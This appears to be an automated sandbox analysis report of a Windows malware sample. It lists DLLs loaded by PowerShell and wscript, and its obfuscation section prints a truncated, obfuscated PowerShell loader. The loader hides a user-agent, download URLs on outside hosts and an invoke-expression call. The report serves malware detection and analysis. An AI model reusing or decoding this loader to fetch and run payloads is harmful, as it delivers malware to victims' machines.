          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47A21000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1543104740.000002CD47990000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: n.pdb source: powershell.exe, 00000005.00000002.1432126948.000001B65C8BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1432612236.000001B65C95A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2658934966.0000022F3971F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.pdbpdbtem.pdb source: powershell.exe, 00000009.00000002.2658538272.0000022F395CF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2658934966.0000022F39763000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: *.pdb source: powershell.exe, 00000002.00000002.1606506810.000002CD5FD1C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdbE source: powershell.exe, 00000005.00000002.1434410083.000001B65CC9A000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Obfuscated command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok Rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor 